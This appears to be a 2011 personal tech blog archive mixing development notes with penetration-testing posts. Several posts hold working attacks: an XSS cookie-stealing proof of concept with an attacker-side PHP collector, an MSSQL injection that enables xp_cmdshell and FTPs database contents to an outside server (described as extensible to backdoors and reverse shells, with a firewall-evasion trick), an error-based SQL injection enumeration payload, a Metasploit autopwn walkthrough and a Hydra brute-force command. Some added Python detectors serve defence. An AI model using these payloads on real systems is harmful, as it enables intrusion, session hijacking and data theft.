Tuesday, December 13, 2011

Drawable mutations

http://www.curious-creature.org/2009/05/02/drawable-mutations/

Modifying one drawable when you do not want to modify another.

Tuesday, December 6, 2011

Saturday, November 5, 2011

Django and MySQL for Python on OSX Lion

Assuming Python and MySQL are already installed:

References:


python setup.py build
sh: mysql_config: command not found
Traceback (most recent call last):
  File "setup.py", line 15, in <module>
    metadata, options = get_config()
  File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 43, in get_config
    libs = mysql_config("libs_r")
  File "/Users/dean/Downloads/MySQL-python-1.2.3/setup_posix.py", line 24, in mysql_config
    raise EnvironmentError("%s not found" % (mysql_config.path,))
EnvironmentError: mysql_config not found

If you are seeing this error, follow the steps found here to resolve it:


Excerpt:
In my case, I edited the setup_posix.py thusly:
# mysql_config.path = "mysql_config"
mysql_config.path = "/usr/local/mysql-5.0.45-osx10.4-i686/bin/mysql_config"
Re-issue command:
python setup.py clean
ARCHFLAGS='-arch x86_64' python setup.py build
ARCHFLAGS='-arch x86_64' python setup.py install
sudo ln -s /usr/local/mysql/lib/ /usr/local/mysql/lib/mysql
Then test:
>>> import MySQLdb

Monday, September 26, 2011

Objective-C rightMouseDown event

When subclassing NSView, override mouseDown: as follows so that a control-click is delivered to rightMouseDown:, the right mouse down handler:

-(void) mouseDown:(NSEvent *)event {
    // a left click with the control key held is treated as a right click
    if (event.modifierFlags & NSControlKeyMask) {
        [self rightMouseDown:event];
        return;
    }
}

Wednesday, August 3, 2011

Import Nessus nbe into Mysql

Discovered this post here from Michael Holstein:

The 2006 version needs some modification to work; here is the whole thing. Tested against BT4 (I know I'm behind). To run the script:

cat [nessus nbe file] | ./nessusimport.pl

Now, to get things set up see below. I apologize for the current formatting:

1. Create a MySQL database and create these tables:
CREATE TABLE ipmain (
  idmain int(10) unsigned NOT NULL auto_increment,
  mainip int(10) unsigned NOT NULL default '0',
  lastnmap datetime NOT NULL default '0000-00-00 00:00:00',
  lastnessus datetime NOT NULL default '0000-00-00 00:00:00',
  ipowner varchar(40) default NULL,
  PRIMARY KEY (idmain),
  KEY xip (mainip)
) ENGINE=MyISAM;

CREATE TABLE nessusresults (
  idnessus int(10) unsigned NOT NULL auto_increment,
  domain varchar(15) NOT NULL default '',
  nessushost int(10) unsigned NOT NULL default '0',
  service varchar(40) NOT NULL default '',
  scriptid int(10) unsigned NOT NULL default '0',
  risk tinyint(3) unsigned NOT NULL default '0',
  timestamp datetime NOT NULL default '0000-00-00 00:00:00',
  msg text,
  PRIMARY KEY (idnessus),
  KEY xidnessus (idnessus),
  KEY knessushost (nessushost),
  KEY knessushost2 (nessushost,service)
) ENGINE=MyISAM;

CREATE TABLE nessusstats (
  idstat int(10) unsigned NOT NULL auto_increment,
  domain varchar(15) NOT NULL default '',
  nessushost int(10) unsigned NOT NULL default '0',
  service varchar(40) NOT NULL default '',
  scriptid int(10) unsigned NOT NULL default '0',
  risk tinyint(3) unsigned NOT NULL default '0',
  timestamp datetime NOT NULL default '0000-00-00 00:00:00',
  PRIMARY KEY (idstat),
  KEY xidstat (idstat),
  KEY kstat (nessushost),
  KEY kstst2 (nessushost,service)
) ENGINE=MyISAM;
----------------------
2. Create the following Perl script:
#!/usr/bin/perl
use strict;
use warnings;
use Date::Manip;
use DBI;

our $TZ = 'US/Eastern';

#####DATABASE PARAMETERS#####

my $DATABASE = "DB GOES HERE";
my $HOST     = "HOSTNAME GOES HERE";
my $USERNAME = "DB USERNAME GOES HERE";
my $PASSWORD = "DB PASSWORD GOES HERE";

#connect to the database server
#DBI->trace(1, "trace.log"); #uncomment to log all DBI stuff
my $dbh = DBI->connect("DBI:mysql:database=$DATABASE;host=$HOST",
    $USERNAME, $PASSWORD, {'RaiseError' => 1})
    or die "Unable to connect: $DBI::errstr\n";

######MAIN PROGRAM LOOP######

# .nbe records are pipe separated; the fields used below are laid out as
#   results|domain|host|service|scriptid|risk|msg
#   timestamps||host|host_start or host_end|date|
# The script reads the .nbe from stdin (or from a file named on the command line).
while (<>) {
    chomp;
    my @results = split /\|/, $_;
    push @results, '' while @results < 7;    # pad short records
    $results[6] =~ tr/;/\n/;
    $results[6] =~ tr/"/'/;

    # risk bucket: 1 = critical/serious/high, 2 = medium, 3 = low, 7 = no risk factor found
    # (.nbe keeps newlines inside the message as a literal backslash-n, hence \\n)
    $results[5] = '7';
    $results[5] = '1' if $results[6] =~ /Risk factor :\\n\\n(Critical|Serious|High)/;
    $results[5] = '2' if $results[6] =~ /Risk factor :\\n\\nMedium/;
    $results[5] = '3' if $results[6] =~ /Risk factor :\\n\\nLow/;

    # trim leading/trailing whitespace from every field
    for (@results) { s/^\s+//; s/\s+$//; }

    my $ip = dot2dec($results[2]);
    next unless ($ip > 0);

    #condition 1 (entry is a timestamp for start/end of host scan)
    if ($results[0] eq "timestamps" and $results[3] =~ /host_end|host_start/) {
        my $timestamp = UnixDate($results[4], '%Y-%m-%d %H:%M:%S');
        updatemainip($ip, $timestamp);
    }
    #condition 2 (entry is a result record with a recognised risk factor)
    elsif ($results[0] eq "results" and $results[5] < 7) {
        my @nessustime = findnessustimestamp($ip);
        my $lastnessus = defined $nessustime[1] ? $nessustime[1] : '';
        updatenessus($results[1], $ip, $results[3], $results[4], $results[5], $lastnessus, $results[6]);
        updatestats($results[1], $ip, $results[3], $results[4], $results[5], $lastnessus);
    }
}

#####GLOBAL SUBROUTINES#####

#turn dotted quad into decimal (0 if the field is not a dotted quad)
sub dot2dec {
    my ($address) = @_;
    return 0 unless defined $address and $address =~ /^(\d+)\.(\d+)\.(\d+)\.(\d+)$/;
    return $4 + ($3 * 256) + ($2 * 256**2) + ($1 * 256**3);
}

#turn decimal into dotted
sub dec2dot {
    my ($address) = @_;
    my @octet;
    for (1..4) {
        unshift @octet, $address % 256;
        $address = int($address / 256);
    }
    return join '.', @octet;
}

#find IP in master table (all SQL below uses bind parameters so scan data
#such as host names or messages is never interpolated into a statement)
sub findmainip {
    my ($ip) = @_;
    my $query = $dbh->prepare("select idmain,mainip from ipmain where mainip = ?");
    $query->execute($ip) or die "Unable to locate IP in table ipmain: $DBI::errstr\n";
    return $query->fetchrow_array;
}

#update/add IP&timestamp in master table
sub updatemainip {
    my ($ip, $time) = @_;
    my @mainip = findmainip($ip);
    if ($mainip[0]) {
        $dbh->do("update ipmain set lastnessus=? where idmain=?", undef, $time, $mainip[0])
            or die "problem with updatemainip 1: $DBI::errstr\n";
    }
    else {
        $dbh->do("insert into ipmain (mainip,lastnessus) values (?,?)", undef, $ip, $time)
            or die "problem with updatemainip 2: $DBI::errstr\n";
    }
    return;
}

#find last nessus timestamp for some IP
sub findnessustimestamp {
    my ($ip) = @_;
    my $query = $dbh->prepare("select idmain,lastnessus from ipmain where mainip=?")
        or die "problem with findnessustimestamp: $DBI::errstr\n";
    $query->execute($ip) or die "Unable to locate nessus timestamp in table ipmain: $DBI::errstr\n";
    return $query->fetchrow_array;
}

#update/add nessus results records in nessusresults table
sub updatenessus {
    my ($domain, $host, $service, $scriptid, $risk, $time, $msg) = @_;
    my $query = $dbh->prepare("select idnessus from nessusresults where nessushost=? and scriptid=?")
        or die "problem with updatenessus 1: $DBI::errstr\n";
    $query->execute($host, $scriptid) or die "Unable to locate record in NessusResults: $DBI::errstr\n";
    my @nessus = $query->fetchrow_array;
    if ($nessus[0]) {
        $dbh->do("update nessusresults set domain=?, nessushost=?, service=?, scriptid=?, risk=?, timestamp=?, msg=? where idnessus=?",
            undef, $domain, $host, $service, $scriptid, $risk, $time, $msg, $nessus[0])
            or die "problem with updatenessus 2: $DBI::errstr\n";
    }
    else {
        $dbh->do("insert into nessusresults (domain,nessushost,service,scriptid,risk,timestamp,msg) values (?,?,?,?,?,?,?)",
            undef, $domain, $host, $service, $scriptid, $risk, $time, $msg)
            or die "problem with updatenessus 3: $DBI::errstr\n";
    }
    return;
}

#add a stats record for every stored result
sub updatestats {
    my ($domain, $host, $service, $scriptid, $risk, $time) = @_;
    $dbh->do("insert into nessusstats (domain,nessushost,service,scriptid,risk,timestamp) values (?,?,?,?,?,?)",
        undef, $domain, $host, $service, $scriptid, $risk, $time)
        or die "problem with updatestats 1: $DBI::errstr\n";
    return;
}
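As an added example (not part of the original post or the Perl script above), the same .nbe record handling in Python: record splitting, the risk bucketing with the same precedence as the script, the dotted-quad-to-integer conversion used for ipmain.mainip, and the host_start/host_end timestamp conversion. The .nbe lines are constructed, not from a real scan.

```python
import ipaddress
import re
from datetime import datetime

# Constructed .nbe records (not a real scan). Newlines inside the message field
# are a literal backslash-n, which is what the Perl regexes above expect.
SAMPLE_NBE = r"""timestamps|||scan_start|Wed Aug 3 10:00:00 2011|
timestamps||192.0.2.10|host_start|Wed Aug 3 10:00:01 2011|
results|192.0.2|192.0.2.10|ssh (22/tcp)|10267|Security Note|An ssh server is running.\n\nRisk factor :\n\nNone|
results|192.0.2|192.0.2.10|www (80/tcp)|11213|Security Hole|Remote code execution.\n\nRisk factor :\n\nHigh|
results|192.0.2|192.0.2.10|smtp (25/tcp)|10263|Security Warning|Banner disclosure.\n\nRisk factor :\n\nLow/Medium|
timestamps||192.0.2.10|host_end|Wed Aug 3 10:05:00 2011|
"""

# Same buckets and precedence as the Perl: a later match overrides an earlier one;
# 7 means no recognised risk factor, and such findings are not stored.
RISK_BUCKETS = [
    (re.compile(r"Risk factor :\\n\\n(Critical|Serious|High)"), 1),
    (re.compile(r"Risk factor :\\n\\nMedium"), 2),
    (re.compile(r"Risk factor :\\n\\nLow"), 3),
]

def risk_bucket(msg):
    bucket = 7
    for pattern, value in RISK_BUCKETS:
        if pattern.search(msg):
            bucket = value
    return bucket

def dot2dec(address):
    """Dotted quad -> integer as stored in ipmain.mainip; 0 for anything that is not IPv4."""
    try:
        return int(ipaddress.IPv4Address(address))
    except ValueError:
        return 0

def parse_nbe(text):
    """Yield host_start/host_end markers and findings that carry a risk factor."""
    for line in text.splitlines():
        f = [x.strip() for x in line.split("|")]
        f += [""] * (7 - len(f))      # pad short records
        host = dot2dec(f[2])
        if host == 0:                  # scan_start/scan_end rows have no host
            continue
        if f[0] == "timestamps" and f[3] in ("host_start", "host_end"):
            when = datetime.strptime(f[4], "%a %b %d %H:%M:%S %Y")
            yield {"type": f[3], "host": host, "when": when.strftime("%Y-%m-%d %H:%M:%S")}
        elif f[0] == "results":
            msg = f[6].replace(";", "\n").replace('"', "'")
            bucket = risk_bucket(msg)
            if bucket < 7:
                yield {"type": "result", "domain": f[1], "host": host, "service": f[3],
                       "scriptid": int(f[4]), "risk": bucket, "msg": msg}
```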



Wednesday, July 13, 2011

Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0

If you see this in Metasploit (for example when using the MS08-067 module):
" Exploit exception: Login Failed: The server responded with unimplemented command 0 with WordCount 0 "

Try:
> set SMBDirect false

Tuesday, May 31, 2011

Friday, May 6, 2011

Metasploit db_autopwn (Postgres)

Step 1: view the active database driver:
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql

[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev

Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"

...

Step 3: run nmap to enumerate the services of the target system(s):
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target])
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps

Step 4: automatically exploit the discovered services:
msf exploit(psexec) > db_autopwn -p -t -e -b



Monday, May 2, 2011

How to steal cookies via XSS

This is a proof of concept demonstrating the fundamentals of stealing cookies via XSS:

There are two parts:

1. The attacker's server that will store the stolen credentials.
2. The vulnerable server that we will be injecting into to steal the session.

Part 1:
This is the code on the server for storing credentials (in PHP). The filename is "malicious.php":

<?php
$fp = fopen("/tmp/tokens.txt", "w");
fwrite($fp, $_GET['code']);
fclose($fp);
?>


As you can see, all the server code does is take a $_GET request and write the value of its 'code' parameter to a file.

Part 2:

In a server that is vulnerable to XSS, input the following malicious code:

<script>new Image().src='[malicious_host]/malicious.php?code='%2Bdocument.cookie</script>

or

<script>document.write('<img src="http://localhost/~dliu/malicious.php?code='%2Bdocument.cookie%2B'">')</script>


This code creates an image whose source points to our malicious server. The request populates the GET variable "code", which the server is expecting to read and write to disk.
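From the defending side, as an added example that is not part of the original post: the exfiltration above leaves a distinctive trace in web server access logs, a request whose query string carries a cookie-shaped value (name=value pairs separated by semicolons, typically including a session cookie name). This detector runs over constructed Apache combined-format lines; the hosts, paths and cookie values are made up.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (no real server). Lines 1 and 3 carry a
# cookie-shaped value in a query parameter, the pattern document.cookie produces.
SAMPLE_LOG = """\
203.0.113.5 - - [02/May/2011:10:01:22 -0400] "GET /malicious.php?code=PHPSESSID%3Dabc123%3B%20lang%3Den HTTP/1.1" 200 5 "http://app.example.com/profile" "Mozilla/5.0"
198.51.100.7 - - [02/May/2011:10:01:30 -0400] "GET /index.php?page=2 HTTP/1.1" 200 512 "http://app.example.com/" "Mozilla/5.0"
203.0.113.9 - - [02/May/2011:10:02:01 -0400] "GET /img.gif?code=sid%3Ddeadbeef HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) \S+" '
                    r'(?P<status>\d+) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
# one or more name=value pairs separated by ';', i.e. the shape of document.cookie
COOKIE_RE = re.compile(r'^[\w.\-]+=[^;]*(?:;\s*[\w.\-]+=[^;]*)*$')
SESSION_HINTS = ("phpsessid", "jsessionid", "asp.net_sessionid", "sid", "session")

def parse_line(line):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def cookie_like_params(url):
    """Return (param, value) pairs whose decoded value looks like a cookie string."""
    found = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for v in values:
            if COOKIE_RE.match(v) and any(h in v.lower() for h in SESSION_HINTS):
                found.append((name, v))
    return found

def find_cookie_exfil(log_text):
    """Flag requests carrying cookie-shaped query values; record the referer host,
    since a referer on another site points at the page the script was injected into."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        params = cookie_like_params(rec["url"])
        if params:
            referer_host = urlsplit(rec["referer"]).hostname if rec["referer"] != "-" else None
            hits.append({"ip": rec["ip"], "path": urlsplit(rec["url"]).path,
                         "params": params, "referer_host": referer_host})
    return hits
```

Marking the session cookie HttpOnly keeps it out of document.cookie in the first place, so the detector is a backstop for cookies that cannot be made HttpOnly.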

Monday, April 11, 2011

4Shadow

OSX IDS

Thursday, April 7, 2011

Clear NSUserDefaults

The following will clear all saved preferences:

[[NSUserDefaults standardUserDefaults] setPersistentDomain:[NSDictionary dictionary] forName:[[NSBundle mainBundle] bundleIdentifier]];

Monday, April 4, 2011

MS-SQL Injection through errors

The following is a very rough outline draft; I will fill in the details at a later date:

Sqlmap (also found on BackTrack) uses a payload similar to the following to generate MSSQL errors. I've found that at times sqlmap will fail for my needs, thus knowing how to manually perform the injection helps.

For example, suppose we know the following form is vulnerable to SQL injection because the following time-based payload delays the response:

1);WAITFOR DELAY '0:0:9'--

We can proceed with the following injection technique to generate some useful information. The following was devised after much testing:

) UNION SELECT 1,2,3,4,5,6,7,8 FROM DATABASE..invoice WHERE 1953=CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+("+qryarg+")+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58))) AND (7022=7022)--

We use 8 columns because the unknown vulnerable query is pulling 8 columns, so our UNION must match that column count. The number of columns was found through the SQL error messages.

We then substitute our qryarg with the query we are interested in.

for i in range(1,500):
    qryarg="SELECT TOP 1 name FROM (SELECT TOP "+str(i)+" name FROM master..sysdatabases ORDER BY name ASC) sq ORDER BY name DESC"

This loops through one request per value of i and enumerates the database names one at a time.

Then we start enumerating table names based on the found database names:

SELECT TOP 1 name FROM (SELECT TOP "+ str(i) +" name FROM DATABASE..sysobjects WHERE xtype = 'U' ORDER BY name ASC) sq ORDER BY name DESC

Repeat the same pattern for columns, then for the actual rows.

Wednesday, March 9, 2011

Hydra-THC HTTP Basic Auth

hydra -L users.lst -P passwords.txt -t12 -f www.site.org http-head / -V

Python tricks

Small notes to myself:

chr() converts an int to a character. CHAR is the equivalent syntax in MSSQL, so when analyzing a query in Python you can add a mapping from that name to the built-in with:

>>> CHAR=chr

Now you can perform the following command:

>>> CHAR(58)
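The CHAR=chr trick still relies on eval() of whatever was pasted. As an added example (not part of the original post), a small tokenizer that decodes a CHAR(n)+'literal' concatenation without evaluating it, plus a helper that pulls every CHAR() run out of a larger payload, such as the :luy: and :kjq: markers in the error-based payload above. The sample payload is a constructed copy of that marker pair.

```python
import re

# Tokens of a T-SQL string concatenation: CHAR(n), a quoted literal ('' escapes a quote),
# the '+' operator, or whitespace. Anything else is rejected rather than evaluated.
TOKEN_RE = re.compile(r"CHAR\((\d+)\)|'((?:[^']|'')*)'|\+|\s+", re.IGNORECASE)

def decode_char_concat(expr):
    """Turn CHAR(58)+CHAR(108)+'x' into the string it builds, without eval()."""
    out = []
    pos = 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError("unexpected token at offset %d: %r" % (pos, expr[pos:pos + 10]))
        if m.group(1) is not None:
            out.append(chr(int(m.group(1))))
        elif m.group(2) is not None:
            out.append(m.group(2).replace("''", "'"))
        pos = m.end()
    return "".join(out)

def find_char_markers(payload):
    """Decode every run of CHAR(n)+CHAR(n)+... inside a payload, e.g. one lifted from a web log."""
    run_re = re.compile(r"(?:CHAR\(\d+\)\+?)+", re.IGNORECASE)
    return [decode_char_concat(m.group(0).rstrip("+")) for m in run_re.finditer(payload)]

# Constructed copy of the marker pair wrapped around the subquery in the payload above.
SAMPLE_PAYLOAD = ("CONVERT(INT,(CHAR(58)+CHAR(108)+CHAR(117)+CHAR(121)+CHAR(58)+(SELECT 1)"
                  "+CHAR(58)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(58)))")
```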

Wednesday, March 2, 2011

SQL Injection to Compromise OS

MSSQL injection example that communicates with an FTP server. The following POC can be extended to download/upload and execute Metasploit payloads for backdoors and reverse TCP connections. Discovered this with a customer who was directly compromised by this very attack vector:

Requirements: MSSQL running with SYSTEM-level (or equivalent) privileges, with the xp_* extended stored procedures still present.

Here is the query in its entirety:

Note: Replace ftp.microsoft.com with your FTP server, and user and password with your username and password.
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; exec master..xp_cmdshell 'mkdir temp& (echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt & (bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Breakdown:

Step 1: Enable xp_cmdshell, which is disabled by default on many SQL servers (2005):
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Step 2: Create temporary directory:
exec master..xp_cmdshell 'mkdir temp&

Step 3: Create preset of FTP commands for execution. We will see this in the next step.
(echo open ftp.microsoft.com& echo user& echo password& echo binary& echo lcd temp& echo put file.txt file.txt& echo bye)>temp\ftpcommand.txt &

Step 4: Query MSSQL for the list of all databases and write it into file.txt, then FTP the result to your server using the commands created in Step 3:
(bcp "select name,dbid,crdate from master.dbo.sysdatabases" queryout b.txt -c -T & type b.txt& del b.txt) > temp\file.txt 2>&1 & ftp -s:temp\ftpcommand.txt & rmdir /S /Q temp';--

Recap:
This command creates a temporary directory "temp", writes a preset of FTP commands for uploading file.txt, runs a SQL query whose database listing is written into that temporary file, uploads the file to the FTP server via ftp -s:temp\ftpcommand.txt (the preset FTP commands), and cleans up at the end (rmdir).

You can obviously expand this to upload/download backdoors to initiate reverse_tcp connections.

Additionally, some trivial obfuscation: hex-encode the query, store it in a variable, then pass that variable to "exec" to bypass primitive application firewalls that key off basic search strings:

declare @q varchar(8000) select @q = [hex-encoded query omitted] exec(@q)

Saturday, February 19, 2011

OSX Convert audio formats

Example of converting to .caff:

afconvert -f caff -d LEI16@44100 -c 1 [input] [output]

Thursday, January 27, 2011

GPG Manual

Nice cheat sheet:

GPG Manual